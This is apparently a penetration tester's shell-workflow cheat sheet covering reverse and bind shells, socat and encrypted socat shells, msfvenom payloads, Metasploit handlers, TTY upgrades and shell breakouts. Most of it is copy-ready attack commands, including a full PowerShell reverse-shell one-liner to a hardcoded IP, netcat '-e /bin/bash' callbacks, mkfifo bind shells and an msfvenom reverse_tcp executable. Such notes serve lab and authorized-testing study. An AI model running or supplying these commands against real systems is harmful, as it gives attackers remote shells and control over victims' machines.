Use this page as the shell workflow during exploitation. Web shells stay separate in web-shells.md because they depend on the web app and upload context.
Shell Types
Interactive shells allow you to interact with programs after executing them, such as nano, su, or sudo.
Non-interactive shells are limited to programs that do not require user interaction. Most raw reverse and bind shells start this way.
TTY, or TeleTYpewriter, refers to a fully interactive and stable terminal session.
A payload is the command and/or code that performs the malicious action from a defensive perspective.
Reverse Shells
A reverse shell is when the attack box will have a listener running and the target will need to initiate the connection. Admins will often overlook outbound connections which gives a higher likelihood of being undetected. We often have a common port for the listener because we want to ensure it does not get blocked going outbound throught the OS firewall or at the network level.
Reverse shells can bypass firewalls rules and are far more commonly used.
# attack box listener
sudo nc -lvnp 443Netcat flags:
-lact as a listener-vrequest a verbose output-ndo not resolve hostnames or use DNS-pindicates what port to use
By default, netcat reverse shells are very unstable. Upgrade Linux shells using the Linux shell upgrade sections below.
Meterpreter to Netcat Shell
# open a standard shell from meterpreter
meterpreter> shell
# start a netcat reverse shell from target machine
nc -e /bin/bash <YOUR_IP> <PORT>Powershell Reverse Shell
# powershell oneliner
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"Some good reverse shells.
Bind Shells
A bind shell is when the target system has a listener started and awaits a connection from an attack box. We would directly connect to the IP address and port on the target. These are subject to incoming firewall rules and requires already being on the internal network already. Most OS firewalls also block most incoming connections that aren’t associated with trusted network-based applications.
Bind shells may be protected by firewalls and are far less common.
# binding a bash shell to the tcp session on the target box
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l 10.129.41.200 7777 > /tmp/f
# creates a named pipe file at /tmp/f
# connecting to bind shell on target
nc -nv 10.129.41.200 7777# Windows bind shell on target machine
nc -lvnp -e "cmd.exe"
# connect from attacker machine
nc MACHINE_IPSocat Shells
Use netcat as a stepping stone into a fully-featured Socat shell, only on Linux targets. Can use Socat for basic Windows shells.
# Windows listener
socat TCP-L:PORT
# Windows target
socat TCP:LOCAL_IP:PORT EXEC:powershell.exe,pipes
# Linux listener with stabilization
socat TCP-L:PORT FILE:tty,raw,echo=0
# Linux target with stabilization
socat TCP:LOCAL_IP:PORT EXEC:"bash -li",pty,stderr,sigint,setsid,saneEncrypted Socat Shells
We can also use encrypted socat shells, by replacing TCP with OPENSSL. You must have an SSL Certificate on the attacking machine.
# Generate certificate
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# Merge into one .pem file
cat shell.key shell.crt > shell.pem
# Reverse shell listener
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 - verify=0
# On target machine
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bashMsfvenom Payloads
Used to generate code for reverse and bind shell, can also be used to generate hexadecimal shell code for buffer overflow exploit. Payloads in various formats of your choosing.
msfvenom -p PAYLOAD OPTIONSUseful options:
-fspecify output format-ooutput location and filenameLHOST=IPspecifies IP to connect back toLPORT=PORTspecify port on local machine to connect back to
Example:
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST= LPORT=Payload types:
- Staged: sent in two parts, stager piece of code on target machine that connects back to a listener to load real payload, does not touch the disk
- Stageless: self-contained but the payload is on the disk so it’s easier to catch
Metasploit Multi Handler
Metasploit Multi/Handler is a good tool to catch reverse shells, especially for meterpreter shells.
msfconsole #open metasploit
use multi/handler
options
set PAYLOAD <PAYLOAD> LHOST <LOCAL-IP> LPORT <PORT>
exploit -j #-j to run as backgroundLinux Shell Upgrades
When we drop into the system shell we notice that no prompt is present in Linux, yet we can still issue some system commands. This a non-tty shell and can prevent the use of essential commands like su or sudo.
Standard Python TTY Upgrade
Use this when Python exists on the target and the shell is a raw reverse shell.
# Check if python exists on the system
which python
# interactice python shell
python -c 'import pty; pty.spawn("/bin/bash")'
# allow Terminal commands
export TERM=xterm
# background the current reverse shell process
Ctrl+Z
# pass all keystrokes to the remote shell
stty raw -echo
# bring the backgrounded reverse shell back to the foreground
fg
# once exited reverse shell, restore terminal to normal
resetrlwrap Listener
Use rlwrap for better line editing, especially with Windows shells.
rlwrap nc -lvnp PORT_NUMBERBasic Interactive Shell
Use this when a full TTY upgrade is not possible but /bin/sh is available.
# interactive mode
/bin/sh -iLanguage Interpreters
Use whichever interpreter is present on the target.
# perl
perl -e 'exec "/bin/sh";'
# ruby - should be run from a script
exec "/bin/sh"
# lua - from a script
os.execute('/bin/sh')
# AWK
awk 'BEGIN {system("/bin/sh")}'Binary Breakouts
Use common binaries that can execute commands if they are available.
# find
find / -name nameoffile -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;
find . -exec /bin/sh \; -quit
# vim
vim -c ':!/bin/sh'
# or within vim
:set shell=/bin/sh
:shellFirst Local Privilege Check
After stabilizing the shell, check what sudo privileges the landed account has.
# find the permissions associated with the account we landed
sudo -lWindows Shell Choice
CMD shell is the original MS-DOS shell built into Windows. It should be used when:
- older host
- only simple interactions needed
- when you want to use simple batch files
- If execution policies may affect your ability to run scripts
Powershell is the more modern implementation of a command-line interpreter with CMD prompt commands alongside new .NET objects. Powershell keeps a record of commands. Powershell also has Execution Policy and User Account Control. So you should use it when:
- You need custom-built scripts
- Stealthy is less of a concern
- cloud-based services and hosts
Windows Payload Types
There are many options to choose from when creating payload types in Windows:
- DLLs are Dynamic Linking Library (DLL) is a library file used in Microsoft OSs to provide share code and data that can be used across many different programs. They can sometimes lead to SYSTEM elevation and/or bypass User Account Controls
- Batch are text-based DOS (disk operating system, old windows) scripts utilized by system admins to complete tasks the command-line.
.batfile extension. - VBS is a lightweight scripting language usually used for client-side scripting in webservers to enable dynamic web pages. They can execute code.
- MSI are installation databases for the Windows Installer.
msiexeccan execute the payload. - Powershell is a shell environment and scripting language.
Windows Payload Transfer
Payload transfer in windows can be facilitated by some of the following tools (by no means extensive):
- Impacket is a python based toolset that interact with Windows network protocols directly.
- SMB is a great exploit route to transfer files between hosts.